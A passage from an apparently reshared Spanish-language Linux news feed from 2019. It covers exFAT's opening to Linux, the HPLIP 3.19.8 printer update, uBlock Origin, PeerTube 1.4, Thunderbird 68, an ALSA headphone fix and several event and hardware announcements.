sudo add-apt-repository ppa:elementary-os/stable
Bookworm es una gran opción para leer libros electrónicos pero (modo broma) tiene un fallo importante: no sirve para leer a Linux Adictos… a no ser que se exporten los artículos a PDF, pero eso ya sería material para otro artículo.
Bild/Foto
Artículo relacionado:
Lucidor: un lector de libros electrónicos multiplataforma

https://www.linuxadictos.com/bookworm-el-lector-de-ebooks-que-todo-devorador-de-libros-deberia-tener-instalado.html

 

Microsoft publica las especificaciones de exFAT para facilitar su inclusión en Linux




Nuestros compañeros de MuyComputer se han hecho de que Microsoft se ha comprometido a incluir soporte de exFAT al kernel Linux, lo cual en un principio es una muy buena noticia.

Según se puede leer en el comunicado de Microsoft publicado por John Gossman, Ingeniero Distinguido de Microsoft y miembro de la Junta de la Linux Foundation, el gigante de Redmond ha decidido publicar las especificaciones de exFAT con el propósito de que llegue a Linux una implementación “conforme y interoperable” del sistema de ficheros. Gossman también ha comentado que apoyan “la inclusión eventual de un kernel Linux con soporte de exFAT en una futura revisión de la Definición del Sistema Linux del Open Invention Network (OIN), una vez sea aceptado, el código se beneficiará de los compromisos de patentes defensivas de los más de 3040 miembros y liceciatarios del OIN.”

Para los que anden perdidos, el OIN es un grupo dedicado a proteger proyectos de código abierto como Linux a través de un programa de patentes defensivas y del cual Microsoft es miembro. Por otro lado, la compañía fundada por Bill Gates y Paul Allen anunció el año pasado la apertura de 60.000 patentes con el objetivo de ayudar en la defensa del ecosistema Linux.

Veremos en qué acaba este movimiento por parte de Microsoft, aunque en un principio todo apunta a que la intención es incluir soporte completo para exFAT out of the box en la versión oficial de Linux, lo que sin duda será una gran aportación para los usuarios de al menos las distribuciones que se apoyan en el kernel oficial, que vienen a ser todas las populares, Android y Chrome OS.

exFAT es en esencia una evolución del sistema de ficheros FAT32 que elimina las limitaciones de este último, además de ser el impulsado por Microsoft para su uso unidades Flash USB y tarjetas SD y sus variantes. Si bien Windows y Mac lo soportan de forma plena, en GNU/Linux tiene que ser añadido desde fuera (generalmente localizado en los repositorios de la distribución de turno) y su soporte era limitado, permitiendo solo leer y escribir, pero no crear sistemas de ficheros.

Este movimiento del gigante de Redmond tendría que eliminar las limitaciones presentes en GNU/Linux y Android, aunque no hay que olvidar que Samsung llegó a publicar una implementación de exFAT bajo GPL que no llegó al kernel Linux debido a unos problemas de patentes que esperemos sean por fin resueltos.

No se puede negar que la política de Microsoft en torno a Linux y el Open Source ha cambiado mucho desde el mítico “Linux es un cáncer” de Steve Ballmer (gracias sobre todo a Satya Nadella), ya que exFAT es una de las patentes utilizadas para cobrarse de los fabricantes de dispositivos Android, pero igualmente no hay que olvidar que sigue aplicando políticas monopolísticas para mantener el dominio de productos como Windows y Microsoft Office.
https://www.muylinux.com/2019/08/29/microsoft-publica-especificaciones-exfat-linux/

 

LyT19: ¡vuelve Linux & Tapas en este 2019!




LyT (Linux & Tapas) es un evento que no te puedes perder. Ya lo hemos venido anunciando otros años atrás, pero ahora regresa una nueva edición LyT19. Otra oportunidad para disfrutar de Linux y la gastronomía española si te perdiste las ediciones anteriores. Para más información puedes visitar el sitio oficial de LyT y desde LxA te animamos a asistir, seguro que no te arrepientes de hacerlo…

Ya lo tienen todo preparado para LyT19. Debes saber que será en León, como siempre. Y que tendrá lugar el sábado 19 de octubre del 2019. Al ser un día no laboral para la mayoría de personas, no tienes ningún tipo de motivo para no acudir. Además, si te apetece participar y contarle algo interesante a los que acudan, puedes hacerlo. El plazo del Call for Papers! está abierto hasta el día 22 de septiembre.

(adsbygoogle = window.adsbygoogle || []).push({});

Tras ese día se dejarán de admitir las propuestas. Así que si tienes en mente una buena charla, puedes mandar las sugerencias al correo electrónico linuxytapas[at]gmail,com. Y por supuesto recuerda que la charla debe estar relacionada con el software libre, código abierto o Linux. En cuanto a la duración, deberá ser de entre 30 y 45 min. De entre todas las charlas recibidas que se ajusten a eso, se hará un filtro y se irá publicando las que se cierren…

Desde LxA no tenemos mucho más que comentar, solo animarte a que vayas, ya sea como ponente o como oyente. Además de los conocimientos técnicos disfrutarás de bebida y tapas por el casco histórico de León, en el Barrio Húmedo. ¿Se puede pedir más? Pues ya sabes, LyT19!!!

El programa que te espera es:

(adsbygoogle = window.adsbygoogle || []).push({});
  • 12:30 – 13:00: quedada en la Plaza de la Catedral de León
  • 13:00 – 16:30: tapeo por el casco histórico
  • 17:00 – 20:00: ponencias en la Fundación Sierra Pambley
  • 21:00: Cena
  • 24:00: Fiesta de despedida
Para inscribirte hazlo desde aquí

https://www.linuxadictos.com/lyt19-vuelve-linux-tapas-en-este-2019.html

 

HPLIP se vuelve a actualizar para soportar nuevos sistemas, en esta ocasión Debian 10 y Linux Mint 19.2, entre otros




Como es habitual en prácticamente todos sus lanzamientos, HP ha aprovechado el lanzamiento de una nueva actualización de HPLIP para añadir soporte para nuevos sistemas operativos. Para ser más concretos, la versión lanzada ayer añadió soporte para Debian 10 Buster, Debian 9.9 Stretch, Linux Mint 19.2 Tina, OpenSuse Leap 15.1, Red Hat Enterprise Linux 8.0 y Manjaro Linux 18.0.4. Además, también se añadió soporte para un grupo de impresoras y escaners que detallaremos a continuación.

HP Linux Imaging and Printing o HPLIP 3.19.8 ha estado en desarrollo durante los últimos dos meses y es la versión que sucede a HPLIP 3.19.6 que se lanzó el pasado junio. A continuación tenéis la lista de novedades en forma de soporte que ha incluido esta versión.

(adsbygoogle = window.adsbygoogle || []).push({});

HPLIP 3.19.8 incluye soporte para estas impresoras y escaners

  • HP DesignJet T1530 Postscript.
  • HP DesignJet T2530 Postscript.
  • HP DesignJet T930 Postscript.
  • HP DesignJet T1600 Postscript Printer.
  • HP DesignJet T1600dr Postscript Printer.
  • HP DesignJet T2600 Postscript MFP.
  • HP LaserJet Pro MFP M329dn.
  • HP LaserJet Pro MFP M329dw.
  • HP LaserJet Pro M305d.
  • HP LaserJet Pro M304a.
  • HP LaserJet Pro M305dn.
  • HP LaserJet Pro M305dw.
HP explica en su nota de lanzamiento que hp-uiscan buscará los tamaños de papel del dispositivo dinámicamente para dispositivos ScanJet.2 y mostrará un mensaje de error cuando se produzca un atasco de papel en los dispositivos ScanJet. Por otra parte, también avisa de algunos errores conocidos, como que unas pocas funciones ScanJet no funcionan en RHEL 8, que la función de buscar en PDF no funciona en Debian 10 y Linux Mint 19.2 o que el comando “hp-scan” no funciona para algunos dispositivos ScanJet que utilizan la conexión USB, ya que la creación de URL del dispositivo tiene problemas. Si el comando “hp-plugin” falla, HP recomienda usar el siguiente comando:

sh hplip-3.19.8-plugin.run
HPLIP 3.19.8 está disponible desde este enlace para un total de 15 distribuciones Linux, entre las que destacan Debian/Ubuntu, Manjaro o Fedora. También hay una versión más general para otras distribuciones.
Bild/Foto
Artículo relacionado:
HPLIP se actualiza añadiendo soporte para Ubuntu 19.04 y Fedora 30

https://www.linuxadictos.com/hplip-se-vuelve-a-actualizar-para-soportar-nuevos-sistemas-en-esta-ocasion-debian-10-y-linux-mint-19-2.html

 

Software libre excelente: El caso de Ublock Origin


Internet es una maravilla, la más grande revolución tecnológica de todos los tiempos. Es una ventana al mundo donde se adquiere conocimiento, donde podrás navegar con tu imaginación, relacionarte a miles de kilómetros, conectar con tu familia desde el otro extremo del mundo .. pero también es un estercolero.

Pocos sitios hay donde no puedas navegar limpiamente y con seguridad, molestas ventanas publicitarias, scripts ocultos que con cualquier clic se activan y te llevan a páginas peligrosas, propagandísticas y tramposas. Al igual que muchos desarrolladores ensucian con programas privativos cuando crean una distribución GNU, los que crean páginas web meten scripts peligrosos y publicidad para sacar algo de dinero. Juegan sucio y ponen un granito de arena más a la polución cibernética. Por suerte, estas tropelías pueden evitarse, o al menos, reducirse considerablemente.

Existe un buen puñado de bloqueadores de anuncios disponibles para tu navegador, así que ¿qué hace que uBlock Origin pueda merecer tu atención? Bueno, si alguna vez has notado que las páginas web se cargan más lentamente con tu bloqueador de anuncios activado, es que esa extensión está consumiendo muchos recursos. UBlock Origin está construido pensando en la eficiencia, por lo que consume menos memoria y menos CPU. Esto significa que puedes navegar más rápido mientras la extensión se encarga de bloquear el contenido no deseado.

Además de eliminar los anuncios molestos de tus sitios favoritos, uBlock Origin también puede ayudarte a proteger tu privacidad. El programa incluye listas de filtros para eliminar servidores de seguimiento, dominios de malware y mucho más.

UBlock Origin está disponible como una simple extensión de navegador para varios de los navegadores más populares, y no sólo los disponibles en GNU/Linux. También es gratuito y de software libre.

Como cualquier bloqueador de anuncios, uBlock Origin es esencialmente un filtro de contenido para un navegador. Funciona en conjunto con listas de filtros, que le indican al programa qué contenido debe bloquear desde tu navegador. Por esa razón, siempre hay dos cosas importantes a considerar cuando se elige un bloqueador: la calidad del programa en sí, y la calidad de las listas de filtros con las que viene empaquetado.

UBlock Origin viene con varias listas de filtros bien mantenidas. Estos incluyen la lista de EasyPrivacy, la lista de dominios de malware, la lista de AdServer y la lista de seguimiento avanzado. uBlock Origin coincide con el contenido que tu navegador intenta cargar contra las listas de filtros activos. El programa filtra los anuncios, los servidores de seguimiento, los sitios de malware, etc.

Cuantas más listas de filtros incluyas en tu bloqueador de anuncios, más coincidencias y bloqueos tendrá que hacer tu equipo. Es por eso que los bloqueadores de anuncios ralentizan tu navegador, ¡le estamos dando mucho más trabajo!

UBlock Origin ha sido elogiado por muchos revisores técnicos por tener una CPU y una memoria más ligera. Al cargar una página web, el programa es capaz de cargar los filtros necesarios sólo para esa página web, en lugar de toda la lista de filtros universales. Esto lleva a un inicio más rápido del navegador y a la carga de la página web.

Otra ventaja de uBlock Origin es su capacidad de utilizar más tipos de listas de filtros que otros bloqueadores. El programa soporta la mayor parte de la sintaxis de los filtros de Adblock Plus. También se pueden importar archivos de hosts. Esto permite a los usuarios avanzados crear sus propios filtros – y para todos los demás, proporciona acceso a listas útiles mantenidas por las comunidades de Internet.

Para terminar, decir que uBlock Origin es un bloqueador de contenido rápido y ligero que proporciona una gran cantidad de listas de filtros para proteger tu privacidad y bloquear anuncios. Si tu bloqueador de anuncios actual te está ralentizando, o no ofrece filtros de privacidad, podría valer la pena instalar uBlock Origin.

UBlock Origin junto a Adblock son ambos, los bloqueadores más usados en el mundo. Y los dos, software libre. Otros ejemplos más de la “mala calidad del software libre“.

UBlock Origin está licenciado bajo la GPL v3 y su código está disponible en GitHub.
https://maslinux.es/software-libre-excelente-el-caso-de-ublock-origin/

 

Resultado de la encuesta sobre el escritorio del hipotético estándard de GNU/Linux


Bueno, estamos ante la encuesta con mayor participación en el blog y es una señal de que sí interesaría una distribución GNU/Linux estandarizada. Próximamente voy a hacer un mockup de cómo veo en mi opinión, que debería de ser la distro.

Los resultados de la encuesta son:
  • KDE Plasma: 568 votos
  • Que la distro te diera a elegir en la instalación: 561 votos
  • GNOME: 416 votos
  • Cinnamon: 213 votos
  • XFCE: 207 votos
  • MATE: 139 votos
  • Deepin: 114 votos
  • Unity: 53 votos
  • Pantheon: 41 votos
  • Todas: 33 votos
  • Budgie: 31 votos
  • LXDE: 28 votos
  • LXQT: 20 votos
  • i3wm: 12 votos
  • Enlightenment: 12 votos
  • Openbox: 11 votos
  • WindowMaker: 10 votos
  • Trinity: 9 votos
Total: 2.478 votos

Pero Houston, tenemos un problema.. alguien introdujo la respuesta “Todas”. No puedes meter en una imagen ISO esa barbaridad de entornos con sus dependencias. Y si se hiciera, no es ya que la imagen pesara 15 GB sino que el sistema sería lentísimo y ya sólo en el inicio la RAM se fuera al Caribe.

Respondiendo a la pregunta de un lector sobre mi voto, lo hice en favor de KDE Plasma, no creo que haya sorpresa en esto. ¿Por qué?

Plasma es el escritorio más moderno e innovador, y el que más desarrollo tiene. Pero en este caso debería de usarse la versión LTS de Plasma y opcionalmente el usuario podría elegir actualizar a las versiones más frescas.

Plasma es hoy en día muy estable. Los abundantes errores son cosas del pasado. Plasma es liviano y no consume muchos recursos. También es tremendamente atractivo y el más versátil. Esas son las razones por las cuales me incliné por este entorno de escritorio.

Pero veo que no se ha entendido la verdadera intención de una distribución estándard o universal. Esta hipotética distro debe ser enfocada exclusivamente a un entorno de escritorio. Si incluimos más, dejaría de ser estándard. Esa es la razón por la que no di una opción de ofrecer distintos entornos, pero sí lo hizo alguien y curiosamente es la segunda opción más votada en la encuesta. Veréis, si se quiere hacer una versión de GNU/Linux estandarizada, el esfuerzo de los desarrolladores debe de ser en un escritorio y sus paquetes/funcionamiento. Si se quiere evitar tanta diversificación*, no tiene sentido diversificar. Así se ahorra también mucho trabajo a los programadores/mantenedores.

En cuanto a su probable funcionamiento con la paquetería, hay una distro muy interesante llamada Nitrux que nos puede dar una pista. Basar la distribución en Ubuntu es, también mi opinión, es la mejor idea. Es la que más soporte y documentación tiene. Como decía, Nitrux trabaja sólo con paquetes AppImage y se le ha quitado el gestor de paquetes APT. Esto último no es buena idea porque por desgracia, no hay paquetes suficientes con el formato AppImage y nos encontraríamos como muy poco software. También debería de llevar una tienda de software exclusivamente con programas auto-ejecutables que no requieran la instalación en zonas críticas del sistema, cosa que haría aún más seguro el sistema.

*La diversificación. Quería decir que en absoluto la irrupción de un sistema universal significaría la desaparición de las demás distros. Cada comunidad seguiría desarrollando la suya, porque la aparición de una estándard no la haría mejor que las demás, sino la más fácil.

 

Dell XPS 13 edición desarrollador


Si quieres un ordenador precargado con Ubuntu, te recomiendo que eches un vistazo al nuevo Adder WS de System76, que parece ser una bestia. Sin embargo, si quieres un portátil más delgado y ligero, los portátiles XPS 13 Developer Edition de Dell definitivamente merecen tu atención. Históricamente han sido muy bien recibidos por los consumidores, y no, no son sólo para desarrolladores. Hoy, Dell presenta la última edición para desarrolladores de XPS 13 y está repleta de hardware moderno.

Bild/Foto

“Hoy nos gustaría anunciar que la nueva edición para desarrolladores de XPS 13 (7390) que pronto estará disponible en los Estados Unidos, Canadá y Europa. Estos sistemas representan la 9ª generación de la edición para desarrolladores del XPS 13 y vendrán con el Killer AX1650 (2×2) construido sobre el chipset Intel WiFi 6. Los nuevos sistemas 7390 coexistirán con la actual edición para desarrolladores 9380 XPS 13”, dice Barton George, de Dell.

George dice además: “La edición para desarrolladores del XPS 13 es la piedra angular de la gama de productos de Project Sputnik. Si no está familiarizado con él, el proyecto Sputnik se puso en marcha hace casi siete años con el objetivo de crear una oferta impulsada por la comunidad de desarrolladores. Sputnik comenzó como un esfuerzo exploratorio, pero gracias al interés y la pasión de la comunidad, el proyecto se convirtió en un producto. El sistema anunciado hoy, el 7390, representa la novena generación de esa oferta inicial”.

Bild/Foto

Barton comparte algunas de las siguientes especificaciones:
  • Opciones de procesador: Procesador Intel Core i5-10210U de 10ª generación (4 núcleos) o procesador Intel Core i7-10710U de 10ª generación (6 núcleos)
  • Ubuntu 18.04 LTS precargado
  • Killer AX1650 (2×2) integrado en el chipset Intel WiFi 6 + Bluetooth 5.0
  • Pantalla InfinityEdge con colocación superior de la cámara
  • Soporte de resolución FHD y UHD
  • Hasta 16GB de memoria LPDDR3 a 2133MHz
  • 2x Thunderbolt 3[DisplayPort / entrega de potencia (4 carriles de PCI Express Gen 3)]
Así que, vamos a aclarar esto. Este portátil cuenta con procesadores Intel Core super modernos de 10ª generación, Wi-Fi 6 (802.11ax) de última generación, Thunderbolt 3, ¿ y viene precargado con Ubuntu? Se cree que se empiece a comercializar a finales de septiembre.

Pero habrá que esperar más, sólo el modelo Core i5 de cuatro núcleos estará disponible inicialmente. Tendrás que esperar hasta octubre para el Hexacore Core i7. El precio aún no se conoce.


 

Solucionar problema de auriculares con Alsamixer


Como todos saben, soy del club de distro-hopping porque voy cambiando, sobre todo con algunos sistemas con los que no estoy familiarizado, y encuentro un problema que persiste independientemente de las distros que uso; si conecto auriculares en el conector de audio trasero de mi viejo iMac, no reproducen audio.

Primero, comprobaba si pulseaudio reconocía que los dispositivos de sonido estaban conectados abriendo la aplicación de control de volumen PulseAudio a través de pavucontrol.

Descubrí que PulseAudio sólo reconocía mi conector de audio como conectado, aunque me decía que mi salida de línea estaba desconectada, por lo que al menos reconocía la salida de línea, pero desafortunadamente no los auriculares conectados.

Luego, traté de ir a través de la pestaña Configuración y las pestañas Dispositivos de Salida cambiando varias opciones, aplicando los cambios y reiniciando Audacity para ver si algo funcionaba.. Nada.

Entonces, decidí que era hora de tomarme un poco más en serio, y me metí en la aplicación de mezclas ALSA (Advanced Linux Sound Architecture).

Al ejecutar por primera vez alsamixer, es posible que se te presente automáticamente el dispositivo de sonido / tarjeta de sonido que deseas modificar (por ejemplo, se me presentó con mi HDMI como predeterminado).

Para cambiar el dispositivo que estás editando, pulsa la tecla F6 y selecciona el dispositivo a editar; el mío se llamaba HD-Audio Generic. Es posible que tengas que seleccionar diferentes dispositivos uno tras otro para encontrar el dispositivo adecuado si no sabes su nombre exacto.

Una vez seleccionado el dispositivo, con las teclas de flecha del teclado, desplázate hacia la derecha hasta que encuentres una configuración llamada Silencio automático – Si esta opción está activada por defecto, deberás cambiarla con las teclas de flecha arriba/abajo para desactivarla y, a continuación, podrás presionar la tecla Escape para salir.

Esto me permitió tener una ruta de audio a mis auriculares. Sin embargo, ahora podía escuchar el audio a través de los altavoces y los auriculares al mismo tiempo.

Para arreglar esto, volví a pavucontrol dentro de la pestaña Dispositivos de salida e inspeccioné qué dispositivos estaban en la lista. Mis altavoces estaban listados como Auriculares (Conectados) pero mis auriculares conectados a la toma de audio trasera seguían estando listados como Line-out (Desconectados). Sin embargo, por probar, seleccioné el dispositivo de salida de línea y me sorprendió escuchar que mis altavoces se silenciaron y que mis auriculares permanecieron activos, resolviendo el problema.

Es una ligera molestia que esto haya ocurrido, y que mi dispositivo esté listado como desconectado a pesar de que estoy escuchando música mientras escribo esto a través de ese mismo juego de auriculares…. Pero funciona. Lo que tengo que probar es si funciona unos auriculares con micro. Los iMacs son jodidos en este punto si no usas el sistema OSX.

Este arreglo debería ser aplicable en cualquier sistema que encuentre este problema, siempre y cuando utilice ALSA y PulseAudio.

 

Microsoft va a incluir soporte exFAT en el kernel de Linux




Durante muchos años Microsoft tuvo una batalla sin fin contra Linux, con lo cual se gano el odio por gran parte de la comunidad y sobre todo bastantes represalias. Pero desde hace algunos años (sobre todo con el cambio de personal de Microsoft) esto ha cambiado pues ya se han dado a conocer varios movimientos de Microsoft en favor de la comunidad open source y sobre todo con Linux.

Y es que recientemente Microsoft dio a conocer mediante una publicación sus intenciones de incluir las especificaciones técnicas para el sistema de archivos exFAT y ha expresado su voluntad de transferir los derechos de uso de todas las patentes relacionadas con exFAT para uso gratuito en Linux.

(adsbygoogle = window.adsbygoogle || []).push({});

Cabe señalar que la documentación publicada es suficiente para crear una implementación portátil de exFAT que sea totalmente compatible con los productos de Microsoft. El objetivo final de la iniciativa es agregar soporte exFAT al núcleo del núcleo de Linux.
Microsoft ♥ Linux: ¡lo decimos mucho y lo decimos en serio! Hoy nos complace anunciar que Microsoft respalda la incorporación de la tecnología exFAT de Microsoft al kernel de Linux.

(adsbygoogle = window.adsbygoogle || []).push({});

exFAT es el sistema de archivos desarrollado por Microsoft que se usa en Windows y en muchos tipos de dispositivos de almacenamiento como tarjetas SD y unidades flash USB. Es por eso que cientos de millones de dispositivos de almacenamiento formateados con exFAT “simplemente funcionan” cuando los conecta a su computadora portátil, cámara y automóvil.
Los miembros de la organización del Open Invention Network (OIN), que incluyen a Microsoft, se comprometen a no hacer demandas judiciales para el uso de sus tecnologías en los componentes del ” sistema Linux.

Pero exFAT no se encuentra entre ellos, por lo tanto, esta tecnología no se extiende a las obligaciones de Microsoft de proporcionar la posibilidad de usar sus patentes.

Para quienes desconocen del sistema de archivos exFAT, deben saber que fue creado por Microsoft para abordar las limitaciones de FAT32 cuando se usa en unidades flash de gran capacidad.

La compatibilidad con el sistema de archivos exFAT apareció en Windows Vista Service Pack 1 y Windows XP con Service Pack 2.

El tamaño máximo de archivo en comparación con FAT32 se amplió de 4 GB a 16 exabytes, la restricción en el tamaño máximo de partición de 32 GB se eliminó para reducir la fragmentación y aumentar Se introdujo un mapa de bits de bloques libres para la velocidad, el límite en el número de archivos en un directorio se elevó a 65 mil, se proporciona la capacidad de almacenar ACL.

El sistema de archivos exFAT utiliza 64 bits para describir el tamaño del archivo, lo que permite aplicaciones que dependen de archivos muy grandes.

El sistema de archivos exFAT también permite clústeres de hasta 32 MB, lo que permite efectivamente dispositivos de almacenamiento muy grandes.

Para abordar la amenaza de reclamos de patentes, Microsoft planea asegurarse de que el controlador exFAT se incluya en la próxima edición de la definición del sistema Linux.

De esta manera, las patentes relacionadas con exFAT entrarán dentro del alcance del acuerdo celebrado entre los miembros de OIN.

Es de destacar que las patentes anteriores para exFAT fueron un enlace clave en la mayoría de las afirmaciones de Microsoft, que afectaron la preinstalación de soluciones basadas en Linux.

Samsung abrió el controlador con la implementación exFAT bajo la licencia GPLv2 hace seis años, pero aún no está incluido en el núcleo principal de Linux debido al peligro de que Microsoft haya presentado una demanda por infracción de patente.

Todavía hay una página en el sitio web de Microsoft que exige una licencia para usar exFAT e información que más de 100 empresas, incluidos los OEM más grandes, han licenciado esta tecnología.

Además es importante recalcar que este movimiento por parte de Microsoft no es liberar el codigo de exFAT (ya que muchos pensaran que pasar a ser open source) cuando no es así. Microsoft solamente está liberando los derechos de uso de exFAT y de reservarse cualquier intención de reclamo o demanda junto con los miembros de la OIN.

Fuente: https://cloudblogs.microsoft.com

https://www.linuxadictos.com/microsoft-va-a-incluir-soporte-exfat-en-el-kernel-de-linux.html

 

Wasteland 3: nuevos datos del videojuego de rol




Wasteland 3 es un videojuego que fue confirmado en 2016, y desde entonces se ha ido filtrando más y más información acerca de él. Ese año se anunció la campaña de crowdfunding para financiar el proyecto de los estudios inXile Entertainment. Ahora han publicado un nuevo tráiler de lo que será este videojuego que estará disponible para varias plataformas, entre ellas también para tu distro GNU/Linux.

Se trata de un videojuego de rol ambientado en una historia postapocalíptica. Más de un siglo después de las bombas, Arizona está muriendo. El Patriarca de Colorado ha prometido salvarlo si los Desert Rangers pueden rescatar su tierra de sus tres hijos sedientos de sangre. En este juego de rol táctico, los Rangers deben viajar al norte para construir una nueva base, equipar un vehículo, entrenar reclutas, explorar los desechos congelados hostiles de Colorado, conocer a los lugareños y decidir a quién ayudar.

(adsbygoogle = window.adsbygoogle || []).push({});

El jugador, podrá sumergirse en esta historia gestionando un escuadrón de batalla que entrará en combate por turnos. El videojuego se controla en una vista desde arriba, que recuerda a otros videojuegos como Commandos, etc. Así podrás manejar a las tropas y también se te da la posibilidad de adentrarte dentro de los edificios que aparecen. Además, el videojuego ha sido diseñado para que haya daños en el entorno cuando se está jugando para que sea más real. Cuenta con un buen sistema de acción y sus gráficos son buenos. Permite jugar tanto en modo single-player o con amigos con el modo multijugador.

Si quieres obtener más información, puedes consultar la página web de estos estudios para Wasteland 3. Desde allí puedes incluso hacer una pre-compra de este título. En cuanto a la fecha de lanzamiento, no se sabe bien cuándo será, solo que vendrá en algún momento de 2020 para Windows, Xbox One y PS4. Probablemente, unos meses después llegue le port para Linux…

https://www.linuxadictos.com/wasteland-3.html

 

GNOME y Endless anuncian una competición para fomentar el FLOSS en la educación




La GNOME Foundation, con el apoyo de Endless, ha anunciado el Coding Education Challenge, una competición para atraer proyectos que ofrezcan a educadores y estudiantes ideas nuevas e innovadores para enseñar a programar código FLOSS. Los premios serán respaldados con 500.000 dólares en fondos y se entregarán a los equipos que avancen en las tres etapas de la competición.

Básicamente, lo que se quiere poner en marcha es una competición con el fin de fomentar ideas y creaciones que se construyan siguiendo los modelos del Open Source y el software libre. De hecho, Neil McGovern, director ejecutivo de GNOME, ha dicho que están “emocionados de ver qué se puede lograr cuando potenciamos la creatividad y la imaginación de nuestra comunidad global”. A esas declaraciones ha añadido que esperan “hacer poderosas alianzas entre los estudiantes y los educadores para explorar las posibilidades de nuestro rico y diverso ecosistema de software”. Por otro lado, Matt Dalio, fundador de Endless, espera que esta competición inspire nuevas ideas que animen a estudiantes y educadores a adoptar la programación en la educación.

GNOME y Endless animan a cualquiera que tenga una idea a enviar su propuesta. Los veinte primeros ganadores serán seleccionados de una convocatoria abierta y cada uno recibirá 6.500 dólares estadounidenses como premio. Esos veinte ganadores pasarán a la siguiente ronda, que consistirá en una prueba de concepto que tiene que derivar en un prototipo funcional de la aplicación. En esa segunda ronda los cinco primeros recibirán un premio de 25.000 dólares y avanzarán a la ronda final, en la que dirimirá el ganador definitivo. El segundo clasificado en la ronda final se llevará 25.000 dólares y el primer clasificado 100.000 dólares.

Los detalles sobre cómo enviar las propuestas cuando se abra la competición serán publicados anunciados en el tablón de noticias de GNOME y a través de las redes sociales. Lo recomendable sería hacer un seguimiento de al menos la mencionada página web, Twitter y Facebook.
https://www.muylinux.com/2019/08/28/gnome-endless-competicion-fomentar-open-source-educacion/

ronaldbueno reshared this.


 

Llega la nueva versión de la plataforma de vídeo descentraliza PeerTube 1.4




Hace poco fue publicada la nueva edición PeerTube 1.4, la cual es una plataforma descentralizada para la organización de alojamiento de vídeo y la difusión del vídeo. PeerTube ofrece una alternativa independiente del proveedor a YouTube, Dailymotion y Vimeo, utilizando una red de distribución de contenido basada en P2P y vinculando los navegadores de los visitantes.

PeerTube se basa en el uso de WebTorrent , que se ejecuta en un navegador y utiliza la tecnología WebRTC para establecer un canal P2P-comunicación directa entre el navegador y el protocolo ActivityPub, lo que permite unir servidores dispares con el vídeo en la red federada general en el que los visitantes están involucrados en la entrega de contenido y tienen la capacidad de suscribirse a canales y recibir notificaciones de nuevos vídeos.

(adsbygoogle = window.adsbygoogle || []).push({});

La interfaz web proporcionada por el proyecto se construye utilizando el framework angular .

La red federada de PeerTube se forma como una comunidad de pequeños servidores de alojamiento de vídeo interconectados, cada uno de los cuales tiene su propio administrador y se pueden adoptar sus propias reglas.

Cada servidor con vídeo desempeña el papel de similar al de BitTorrent, en el que se encuentran las cuentas de usuario de este servidor y sus vídeos.

(adsbygoogle = window.adsbygoogle || []).push({});

El identificador de usuario se forma en la forma “@ username @ server_domain”. La transferencia de datos durante la visualización se realiza directamente desde los navegadores de otros visitantes que ven el contenido.

Además de distribuir el tráfico entre los usuarios que miran vídeos, PeerTube también permite que los sitios lanzados por los autores para la colocación inicial del vídeo almacenen en caché los vídeos de otros autores, formando una red distribuida no solo desde los clientes, sino también desde los servidores, además de proporcionar tolerancia a fallas.

Los usuarios pueden rastrear la actividad en canales de vídeo seleccionados suscribiéndose a canales de interés en redes sociales federales (por ejemplo, Mastodon y Pleroma) o vía RSS.



Actualmente, se lanzan 320 servidores para alojar contenido , con el apoyo de varios voluntarios y organizaciones.

Principales novedades PeerTube 1.4


En esta nueva versión se agregó el soporte experimental para complementos y temas que se pueden instalar a través de la interfaz web del administrador.

Para cada instancia de PeerTube, se puede seleccionar un tema personalizado (el administrador descarga los temas, luego de lo cual están disponibles para que los usuarios los activen).

También fue añadida soporte para descargar archivos de audio, además PeerTube creará un video con una imagen estática sobre la base, al fusionar el archivo de sonido con la portada del álbum y los parámetros del archivo.

Se destaca también el soporte implementado para el registro de usuarios en varias etapas. Los nuevos usuarios pueden crear su propio canal (nombre de usuario / canal). De manera predeterminada, se muestra al usuario la página de su canal y no la página de inicio de la cuenta.

La interfaz de publicación de vídeo se ha rediseñado, se ha agregado la capacidad de establecer el tiempo de inicio y finalización de la reproducción, subtítulos, banderas para la reproducción automática y en bucle.

Por otro lado, fue corregido un problema de seguridad causado por los moderadores que podían crear y modificar configuraciones de usuario privilegiadas. De ahora en adelante, las acciones de los moderadores se limitan solo a los usuarios comunes.

De los demás cambios que se destacan de esta nueva versión, podremos encontrar lo siguiente:
  • Añadida la capacidad de usar los parámetros muted, loop y peertubeLink en la URL
  • Se proporciona la salida en orden cronológico de grupos de suscriptores y vídeos agregados recientemente
  • Se agregó un filtro de idioma que le permite mostrar vídeo solo en ciertos idiomas;
  • Se agregó la posibilidad de transferir a la categoría de vídeos públicos privados o aún no publicados, así como listas de reproducción
  • La capacidad de transcodificar video en calidad 4K
  • Se proporciona soporte para la eliminación federada de comentarios (en otros servidores) eliminados por el propietario del vídeo
  • Se agregó la capacidad de establecer una contraseña de administrador durante el primer inicio
  • Las utilidades de la CLI se colocan en un paquete separado para reducir el tamaño de las dependencias del servidor
  • Caché de archivo estático mejorado y visualización de fuente más rápida.

https://www.linuxadictos.com/llega-la-nueva-version-de-la-plataforma-de-video-descentraliza-peertube-1-4.html

 

Thunderbird 68 llega con pequeños retoques en la interfaz y muchos cambios




El pasado 9 de julio, Mozilla lanzó la última actualización mayor de su navegador, Firefox 68. Hoy, a la compañía famosa por ser la creadora del navegador del zorro le ha tocado hacer lo propio con su cliente de correo, un Thunderbird 68 que ya está disponible para su descarga. Si comparamos las listas de novedades, parece que la de Thunderbird incluye más cambios destacados que la de Firefox, por lo que también podríamos decir que es una actualización más importante.

En total, Thunderbird 68 llega con 12 funciones nuevas, 19 modificaciones y 11 correcciones. Entre las funciones nuevas, que suele ser lo que más interesa a muchos usuarios, tenemos la posibilidad de marcar todas las carpetas de una cuenta como leídas o la autenticación OAuth2 para el correo Yandex. Entre las modificaciones, podemos destacar pequeños cambios en la interfaz como unas mejoras en el calendario para el diálogo de eventos.

(adsbygoogle = window.adsbygoogle || []).push({});

Nuevas funciones incluidas en Thunderbird 68

  • Los archivos adjuntos de enlace ahora pueden vincularse nuevamente en lugar de cargarlos otra vez.
  • Posibilidad de marcar todas las carpetas de una cuenta como leídas.
  • Posibilidad de ejecutar filtros periódicamente.
  • Mejorados los filtros al iniciar sesión.
  • Autenticación OAuth2 para Yandex.
  • Los paquetes de lenguajes ahora se pueden seleccionar en las opciones avanzadas.
  • Se ha añadido un motor de políticas que permite implementaciones personalizadas de Thunderbird en entornos empresariales, utilizando la Política de grupo de Windows o un archivo JSON multiplataforma.
  • Protocolo TCP keepalive para IMAP.
  • Soporte completo para Unicode para interfaces MAPI.
